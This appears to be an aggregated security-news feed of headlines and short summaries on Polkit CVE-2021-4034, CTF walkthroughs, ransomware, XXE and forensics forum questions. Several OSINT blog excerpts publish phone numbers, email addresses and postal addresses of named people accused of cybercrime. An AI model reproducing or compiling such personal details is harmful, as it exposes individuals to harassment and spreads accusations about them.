    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IP addresses accounts: …
    The Evolution of Encrypted IM Messenging Platforms - The Rise and Future of the OMEMO Protocol - An Analysis
    Dear blog readers, I've decided to share with everyone an article that I've been recently working on namely the rise of the OMEMO real-time Jabber/XMPP encryption protocol and also discuss in-depth the security risks involved in OMEMO type of communications including to offer practical security and privacy recommendation advice which I originally wrote for my ex-employer Armadillo Phone. In a modern and vibrant secure and encrypted mobile device ecosystem facing various hardware and physical security type of threats including the general rise of insecure WiFi hotspots and various other factors including the rise of various nation-state and rogue and malicious advanced persistent threat type of malicious and fraudulent campaigns a new protocol has recently emerged called OMEMO basically lim…
    Exposing a Currently Active Portfolio of Rogue and Fake Tech Support Scam Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of fake and rogue fake tech support scam domains with the idea to assist everyone in their cyber attack attribution efforts. Sample rogue fraudulent and malicious tech support scam domains include: …
    Profiling FBI's Most Wanted Iran-based Cybercriminals - Mohammad Sagegh Ahmadzadegan - An OSINT Analysis
    In this post I've decided to expose and offer personally identifiable information on Iran's based cybercriminal known as Mohammad Sagegh Ahmadzadegan for the purpose of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Mohammad Sagegh Ahmadzadegan includes: Name: Mohammad Sagegh Ahmadzadegan Handle: Nitrojen26 Email: nitr0jen26@asia[.]com; Nitrojen26@yahoo[.]com; me@sadahm[.]net Web Site: hxxp://sadahm[.]com Social Media Accounts: https://twitter[.]com/nitrojen26 Sample personally identifiable photos of Mohammad Sagegh Ahmadzadegan include: Stay tuned!
    Profiling FBI's Most Wanted Cybercriminal Mujtaba Raza from Forwarderz and SecondEye Solution - An OSINT Analysis
    In this post I've decided to offer in-depth and practical and relevant OSINT analysis of FBI's Most Wanted Cybercriminal Mujtaba Raza from the Forwarderz and SecondEye Solution fake documents and IDs selling Pakistan-based rogue fraudulent and malicious online enterprise with the idea to assist U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample Web sites known to have been used by Forwarderz and SecondEye Solution: hxxp://secondeyesolution[.]su hxxp://secondeyesolution[.]ch hxxp://secondeyesolution[.]ru hxxp://secondeyesolution[.]com hxxp://forwarderz[.]com hxxp://secondeyehost[.]com Sample screenshots of various Forwarderz and SecondEye Solution domains include: Stay tuned!
    A Peek Inside Today's Modern RATs (Remote Access Tools) and Trojan Horses C&C (Command and Control) Communication Channels - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of RATs (Remote Access Tools) and trojan horses C&C (Command and Control) communication channels including actual currently active names of RATs (Remote Access Tools) and trojan horses with the idea to assist everyone in their cyber attack and cyber attribution campaigns where the C&C (Command and Control) communications channels which I'll share exclusively rely and use static and dynamic DNS and IP providers for the actual C&C infrastructure which is a common TTP (Tactics Techniques and Procedures) for this type of malicious software releases. Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 include: Casa RAT Back Orifice Bandook RAT Dark Comet Rat Cerberus Cybergate…
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio – Part Three – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Profiling a Currently Active Personal Email Address Portfolio of Members of Iran's Ashiyane Digital Security Team - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active personal email portfolio belonging to members of Iran's Ashiyane Digital Security Team with the idea to assist everyone in their cyber attack or cyber threat actor attribution campaigns. Sample currently active personal emails known to belong to members of Iran's Ashiyane Digital Security Team: …
    Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part Two – An OSINT Analysis
    Dear blog readers, I've decided to share with everyone yet another batch of currently active rogue and malicious CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution campaigns including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Exposing a Currently Active CoolWebSearch Domains Portfolio - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of rogue and malicious CoolWebSearch IPs with the idea to help everyone in their cyber attack attribution campaign including cyber threat actor attribution campaigns. Sample currently active rogue and malicious CoolWebSearch domains portfolio: …
    Profiling Yaroslav Vasinskyi from the Kaseya Ransomware Attack Campaign - An OSINT Analysis
    It appears that the U.S Justice Department has recently made arrests in the Kaseya ransomware dropping campaign and I've decided to dig a little bit deeper and actually offer and provide the necessary actionable intelligence in the context of exposing the individuals behind these campaigns in the context of assisting U.S Law Enforcement on its way to track down and prosecute the cybercriminals behind these campaigns. Sample personally identifiable information on Yaroslav Vasinskyi: Mobile: +380993082660 Phone: 1-800-225-5324 which is actually the phone number of the FBI Personal email address accounts: yarik45@gmail[.]com, yaroslav2468@mail[.]ru Online handles: Yarik45, Yaroslav2468 ICQ: 635995970 including the following Web site which is he known to have been offering around…
  • Open

    Are there any dynamic lists that are maintained to track VPNs egress points like nord or surfshark?
    submitted by /u/krattalak [link] [comments]  ( 1 min )
  • Open

    Targeted Healers: Open Source Analysis of Attacks on Hospitals and Medical Staff in Sudan
    Open source evidence shows how Sudan’s security forces attacked hospitals, medical workers and patients during recent protests in Khartoum Continue reading on Medium »  ( 7 min )
    Try Hack Me’s OhSint:A Walkthrough
    ​Hello readers, welcome to this segment of my blog, as I guide you to solve the OhSint Room, hosted on TryHackMe.This room is a lot of fun! Continue reading on Medium »  ( 2 min )
  • Open

    Anyone done the FLETC forensics courses?
    I'm doing forensics for the military and have an upcoming Digital Evidence Collection in an Enterprise Environment course at FLETC. Since a lot of members of this subreddit are LE, I was wondering if any of you have taken this course and, if so, how was it? submitted by /u/Sandyblanders [link] [comments]  ( 1 min )
  • Open

    Zero trust countdown: New OMB memo stresses urgency for modern AppSec
    A new OMB memo from the White House is underscoring the need for federal agencies to adopt zero trust architecture in AppSec. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    [Day 6] Web Exploitation Patch Management Is Hard | Advent of Cyber 3 (2021)
    Local File Inclusion Vulnerability  ( 4 min )
    Union from HackTheBox — Detailed Walkthrough
    Showing you all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    Full read SSRF via Lark Docs `import as docs` feature
    Lark Technologies disclosed a bug submitted by sirleeroyjenkins: https://hackerone.com/reports/1409727 - Bounty: $5000

  • Open

    Certification Question
    I am enrolled in a boot camp for Certified Computer Forensics Examiner/ Certified Mobile Forensics Examiner through InfoSec Institute next week. This was to prepare us for IACRB's certifications CCFE/CMFE. This morning, I noticed that InfoSec pulled the original syllabus, IACRB's website is locked down and have since learned that IACRB is now dissolved. InfoSec says that the certification will be now issued by them instead of IACRB (apparently, IACRB was affiliated with them originally). I know certifications aren't the end-all, be-all (experience is key, I know). But I want to make sure that I am receiving certs from organizations that are trustworthy. I've seen many job postings asking for the CCFE especially. Does this matter at all? Did IACRB's standing show any clout previously and will this now be lost? submitted by /u/FormerFive0 [link] [comments]  ( 2 min )
    Help with a ransomware infected Synology NAS
    Hi all, I recently encountered a Synology NAS with proprietary Synology RAID on both of its 4TB HDDs. I initially intended to acquire both drives and attempt to rebuild the RAID with all possible bit and strip size combinations but realised that it might not be worth it. My objective was to reacquire a readable drive and process the data in AXIOM for timeline, event logs analysis etc. My last resort would be to run the NAS on a simulated network to access the files. But I realise that even then I may not be able to target a network drive to acquire the data. Perhaps only log file analysis by exporting Linux artefacts (bash history, recent files, system logs etc.). Would like to seek advice from those who had previously encountered such exhibits and how you managed to retrieve log records. Would running KAPE on a host network PC targeting the network drive or perhaps using a Tsurugi OS machine and linking it to the NAS to run analysis tools be useful here? submitted by /u/Drako880 [link] [comments]  ( 2 min )
    Did Encase support linux/docker forensic
    Which Encase enpack can we get memory of Linux physical machine and docker memory? Which are the Linux forensic artifacts support by Encase besides user login/bash history/process/network info, any Enpack can use? Did Encase provide timeline analysis for linux image/Docker image? submitted by /u/cyberfo [link] [comments]  ( 1 min )
  • Open

    Anyone have a good list of people to follow on twitter for security updates? Preferably ones that have a lot of technical content.
    I know twitter is very good for security news, but a lot of the ones I find are just like news sites that don't tell me much about the technical side of new vulnerabilities, attacks and bugs. I'm interested in pretty much all topics of security. Appsec, mobile sec, threat modelling, anything. If you have lists of people to follow who go into great technical detail, I'd be very grateful! Thanks! submitted by /u/Epsi0 [link] [comments]  ( 1 min )
    what is the best way to cleanse a PC?
    I'm no tech buff so sorry if I'm asking all the wrong questions. But when I was living with family my siblings would test out their spyware hacks on my laptop/phones. I remember on the laptop I could tell when they were trying something because it would start acting funny and on startup or mid session there would be a couple cmd boxes that would appear, run something and close out by themselves. Recently I'm seeing the same type of things happening mainly on my GF's laptop but we are renting our own apartment so I am a little worried about security. I'm using Avira anti-virus but honestly think these things are a joke. My question is how exactly do you protect against and get rid of attacks like this? I have tried reformatting the drives in the past but that would only last long enough for whatever I deleted to redownload, then I'll be having the same symptoms all over again. Sorry for the broad description, like I said I'm not that tech savvy, but thanks for you guys' time and hopefully can point me in the right direction. Much appreciated! submitted by /u/Questionable_Qs_2655 [link] [comments]  ( 2 min )
    How does clicking a email link result in installing malware?
    Can someone explain exactly how clicking on a link on a email can install malware on device? submitted by /u/LagunaLoireFF8 [link] [comments]  ( 1 min )
    How do you manage auxiliary AD accounts password expiration ?
    For example, separated admin accounts in an Active Directory without interactive logons (run-as): you don't get interactive notifications about password expiration for that account... how do you manage this? Script? submitted by /u/arnaudluti [link] [comments]  ( 2 min )
    Why should sensitive documents not be sent via Email?
    Why do people advise against sending sensitive documents via Email? submitted by /u/Linux98 [link] [comments]  ( 2 min )
  • Open

    CVE-2021-4034
    Article URL: https://ariadne.space/2022/01/27/cve-2021-4034/ Comments URL: https://news.ycombinator.com/item?id=30105994 Points: 2 # Comments: 0  ( 4 min )
  • Open

    StellarParticle Campaign: Novel Tactics and Techniques | CrowdStrike
    submitted by /u/dmchell [link] [comments]
    Prime Minister’s Office Compromised: Details of Recent Espionage Campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Technical Analysis of CVE-2022-22583: Bypassing macOS System Integrity Protection (SIP)
    submitted by /u/shleimeleh [link] [comments]
    OSS PwnKit Detector (CVE-2021-4034)
    submitted by /u/SRMish3 [link] [comments]  ( 1 min )
    PwnKit: How to detect privilege escalation using CrowdSec
    submitted by /u/klausagnoletti [link] [comments]
    [New] Configuring Linux AuditD for Threat Detection
    submitted by /u/InH4te [link] [comments]
    How to use FaPro to simulate multiple devices in network
    submitted by /u/ntestoc3 [link] [comments]
  • Open

    Domain Persistence: Golden Certificate Attack
    Introduction Security analysts who have some knowledge about Active Directory and pentesting would know the concept of tickets. Kerberos, the default authentication mechanism in an The post Domain Persistence: Golden Certificate Attack appeared first on Hacking Articles.  ( 10 min )
  • Open

    Sleep Attack: Intel Bootguard vulnerability waking from S3 (2021)
    Article URL: https://trmm.net/Sleep_attack/ Comments URL: https://news.ycombinator.com/item?id=30103498 Points: 1 # Comments: 0  ( 10 min )
    Xerox vulnerability to remotely brick network printers
    Article URL: https://neosmart.net/blog/2022/xerox-vulnerability-allows-unauthenticated-network-users-to-remotely-brick-printers/ Comments URL: https://news.ycombinator.com/item?id=30097563 Points: 2 # Comments: 0  ( 8 min )
    Polkit vulnerability was discovered in 2013
    Article URL: https://twitter.com/ryiron/status/1486207182404472832 Comments URL: https://news.ycombinator.com/item?id=30094998 Points: 2 # Comments: 0  ( 1 min )
  • Open

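    VulnHub DC-6 target machine: detailed penetration walkthrough
    A very detailed walkthrough of penetrating the DC-6 target machine, shared purely for learning and discussion.  ( 1 min )
    FreeBuf Morning News | Tor Project sues a Russian court; UK plans to educate children about the consequences of DDoS attacks
    The cybercrime unit of the UK's National Crime Agency (NCA) is starting work on a programme to educate children about the consequences of DDoS attacks.  ( 1 min )
    Full translation and analysis of the US "Memorandum on Improving the Cybersecurity of National Security, Department of Defense, and Intelligence Community Systems"
    This article analyses the "Memorandum on Improving the Cybersecurity of National Security, Department of Defense, and Intelligence Community Systems" (NSM) signed by US President Biden from three angles: the background to its release, six highlights, and industry reaction.  ( 1 min )
    Efficient information gathering for penetration testing (consolidated)
    Almost every security practitioner learning penetration testing is told that information gathering is the essence of penetration testing, but is that really the case?  ( 2 min )
    US government formally releases its zero trust strategy, aiming to achieve specific goals by fiscal year 2024
    Launches a government-wide migration to a zero trust framework to substantially reduce the risk of cyberattacks against the federal government's digital infrastructure.
    python_mmdt: comparing ssdeep, tlsh, vhash and mmdthash (Part 6)
    This article compares how ssdeep, tlsh, vhash and mmdthash perform, using a correlation analysis of 400 test files.  ( 3 min )
    Implementing SMS alerts when a host comes online in CobaltStrike [one more useless trick added]
    Ding! You have a new host online, please check it!  ( 1 min )
    Ten departments, including the Office of the Central Cyberspace Affairs Commission, release the "Digital Rural Development Action Plan (2022-2025)"
    Built around its development goals, the Action Plan sets out 26 key tasks across 8 areas.
    [Intelligence tools] 24 open government data platforms in China and abroad
    Open data, and government open data in particular, is an important and vast class of resource that has still not been properly developed and used.  ( 1 min )
    Linux Polkit root privilege escalation vulnerability (CVE-2021-4034)
    polkit is an application-level toolkit that enables communication between processes of different priority levels by defining and auditing permission rules.  ( 1 min )
    "Gartner 2022 Critical Capabilities for Network Firewalls" report released; Fortinet receives the highest scores in three use cases
    The World Economic Forum estimates that global cybercrime spending will reach a staggering US$2.2 trillion in 2022.  ( 1 min )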
  • Open

    SecWiki News 2022-01-27 Review
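    2021 IoT device CVE leaderboard by ourren Reproducing two Flare-On 8th challenges by ourren Incident response: trojan detection with Yara rules by ourren ISOON2021 offline domain penetration write-up by ourren Decentralized CS check-in by ourren Vulnerability monitoring platform: Monitor by ourren On the importance of API security and approaches to governing it by ourren For more of the latest articles, visit SecWiki  ( 2 min )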
  • Open

    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on InfoSec Write-ups »  ( 4 min )
    The Story of a RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them… Continue reading on Medium »  ( 4 min )
    How I was able to get HOF in one of the world’s leading hotel brands by 30 mins of googling.
    Hey Folks! Yash Dharmani (H1GH4T) here, Hope you’re all doing good. Continue reading on Medium »  ( 2 min )
    Finding bugs in Symfony
    Cre:How I was able to find multiple vulnerabilities of a Symfony Web Framework web application | by Abid Ahmad | Jan, 2022 | Medium Continue reading on Medium »  ( 1 min )
    Uppsala Security runs a bug bounty totaling $200,000 with Nakji Network
    Uppsala Security is running a bug bounty program together with Nakji Network, a blockchain on-chain data indexing project. Continue reading on Medium »  ( 2 min )
  • Open

    Threat Assessment: BlackCat Ransomware
    BlackCat ransomware (aka ALPHV) is notable for its use of the Rust programming language and an aggressive approach to naming and shaming victims. The post Threat Assessment: BlackCat Ransomware appeared first on Unit42.
  • Open

    CyberDefenders | Hacked
    The Forensics write-ups  ( 4 min )
    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and…  ( 3 min )
    Bounty Hacker CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s Bounty Hacker CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    WGEL CTF — TryHackMe Walkthrough
    A comprehensive walkthrough of TryHackMe’s WGEL CTF Continue reading on InfoSec Write-ups »  ( 3 min )
    Day 19, Web Reconnaissance Or Information Gathering — Part 4#100DaysofHacking
    Get all the writeups from Day 1 to 17, Click Here Or Click Here.  ( 3 min )
  • Open

    Improper access control for users with expired password, giving the user full access through API and Git
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1285226 - Bounty: $950
    subdomain takeover on fddkim.zomato.com
    Zomato disclosed a bug submitted by mosec9: https://hackerone.com/reports/1130376 - Bounty: $350
  • Open

    This subreddit in the WayBack Machine.
    https://web.archive.org/web/*/https://www.reddit.com/r/opendirectories/ https://web.archive.org/web/*/https://old.reddit.com/r/opendirectories/ submitted by /u/EmuAnon34 [link] [comments]  ( 1 min )
  • Open

    CyberSoc | Cyber Detective CTF Write Up — Evidence Investigation
    OSINT-focused CTF Challenges. OSINT in Goverment, Stego, Crypto multiple languages, WIFI, EXIF and more Continue reading on Medium »  ( 4 min )
  • Open

    [Cullinan #26] Add XXE (XML External Entity)
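    This is Cullinan log #26. I added the XXE entry. I usually post once several changes have accumulated in Cullinan, but this time the gap got rather long, so I'm posting it as a log. For the countermeasures part of the XXE content, OWASP has organized it so well that it is currently almost entirely replaced by a single link; I'll write that part up in more detail myself and update it 😅 Add XXE (XML External Entity)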
  • Open

    Exposing FBI's Most Wanted Iran's Mabna Hackers - An OSINT Analysis
    Dear blog readers, In this post I've decided to share actionable intelligence on the online infrastructure of FBI's Most Wanted Iran's Mabna Hackers for the purpose of assisting everyone in their cyber attack and cyber threat actor attribution campaigns. …
    Exposing Behrooz Kamalian's Ashiyane ICT Company - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone some practical and actionable threat intelligence information regarding members of the Ashiyane Digital Security Team also known as Behrooz Kamalian's Ashiyane ICT Company for the purpose of assisting everyone in their cyber attack and cyber attack attribution campaigns. Name: Behrooz Kamalian Postal address: Tajrish Sq, Fana Khosro St,Amir Salam Alley,No 22, Ashiyane ICT Company Phone number: 22727284-5 Fax number: 22727283 email: nima.salehi@yahoo.com Technical Handle: nic36928h37 Name: Behrooz Kamalian email: nima.salehi@yahoo.com Domain Name: ashiyane.ir Legal Holder: Behrooz Kamalian Postal address: Unit 28, Floor Seven, 36 Building , Daneshvar alley, Jamalzadeh St. , Enghelab Sq. Tehran, IR 1336925748 Phone number: +98.2166935551 Fax number: +98.2166930577 Admin Contact: nic36928h37 Technical Contact: nic36928h37 Domain Name Server1: ns1.ashiyane.org Domain Name Server2: ns2.ashiyane.org Request Date: 29 December 2005 Last Verification: 21 September 2006 Reseller: Govah Tadbir Rayaneh Postal address: Unir 1 , 1th Floor , No.376 , North Bahar St . Phone number: +98 21 88849956-7 Fax number: +98 21 88307682 email: info@tadbir.ir
    Profiling the Emotet Botnet C&C Infrastructure - An OSINT Analysis
    Dear blog readers, I've decided to share a recently obtained Emotet botnet C&C server IPs for the purpose of empowering everyone with the necessary technical information on their way to track down and monitor the botnet including to possibly assist and help where necessary in terms of cyber attack campaign attribution including cyber threat actor attribution campaigns. Sample currently active Emotet botnet C&C server IPs: …

  • Open

    ZAP vs Burpsuite in my mind at 2022
    Hi :D I’m going to compare ZAP and Burpsuite after a long time. Of course, it’s extremely subjective, so I hope you lightly enjoy it.
    📌 TL;DR
    - ZAP has powerful scripting engine and automation
    - Burpsuite has powerful scanning engine and That’s Early adopter.
    - They’re both really cool tools.
    🔍 Compare | ZAP | Burpsuite
    Proxy | O, HTTP/1.1 | O🎖 HTTP/1.1, HTTP/2
    Passive Scan | O | O
    Active Scan | O | O
    Scan Configuration | O🎖, Easy, Detail control | O
    Scan Results | O, Mapping more information | O, Detail results
    Live Scan | O, ATTACK Mode | O, Live tasks
    Manage scope | O, Detail | O, Easy
    Manage workspace | O | O
    Spidering | O, Spider, Ajax Spider | O, Powerful Crawler
    Extensions (Addons) | O, High quality | O🎖, High quality, Many features
    Scripting | O🎖, Zest 👍, Ruby, Python, JS, Groovy, Etc | O, Python, Ruby
    Performance | O, Fast, bu…
    XXE (XML External Entity)
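    🔍 Introduction XXE (XML External Entity) is an attack that induces a service which parses and uses XML to parse malicious XML, so that it performs the actions the attacker intends. Because the impact originates from wherever the XML parser sits, it can range from something as light as SSRF-style internal network access all the way to RCE. 🗡 Offensive techniques Detect Put simply, you need to find where an XML parser is running. If you are able to see the source code, searching the code is the fastest and most efficient approach; if you have to go purely by behaviour without source code, you should focus your checks on places that accept a .xml file as a parameter or that emit XML parsing errors.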
  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public facing SQL servers, more specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if its possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    I've seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. What separates Redwolf from other DDoS sites you find all around in terms of legality? I understand that Redwolf is used legally and the other ones usually aren't, but what makes the website itself legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB SOLUTIONS
    Directory Traversal (directory and file traversal) lets attackers access restricted directories on a web server and the web server's root directory… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

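    [Security Advisory] Linux Polkit local privilege escalation vulnerability (CVE-2021-4034...
    Recently, a local privilege escalation vulnerability in the Polkit toolset on Linux appeared online; any unprivileged local user can use this vulnerability to obtain root...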
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021 Annual Advanced Threat Research Report by ourren [HTB] Safe Writeup by 0x584a For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

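    Preparation and exam experience for the old-format OSCP
    I passed the OSCP exam in December 2021. Because the OSCP exam was reformed on January 11, 2022, the exam-experience part of this article is no longer of much reference value; the practical tips and preparation parts are still worth consulting  ( 1 min )
    FreeBuf Morning Report | New vulnerability disclosed in Linux systems, affecting all versions; Segway online store attacked
    A security vulnerability (CVE-2021-4034) exists in Polkit's pkexec component, which means the default configuration of almost every Linux distribution contains this vulnerability; an attacker can use it to gain root privileges on the system.  ( 1 min )
    A study of the technical points of phishing attacks
    A study of phishing approaches.  ( 1 min )
    How to use Yakit for traffic hijacking
    Yakit basically implements Burp's hijacking and packet-capture functions and basically covers the concrete usage scenarios as well; as an open-source project that has only recently started, we hope everyone pays it attention~  ( 1 min )
    Serious programming error may lead to file deletion, hackers use new malware to evade detection | Global cybersecurity highlights for January 26
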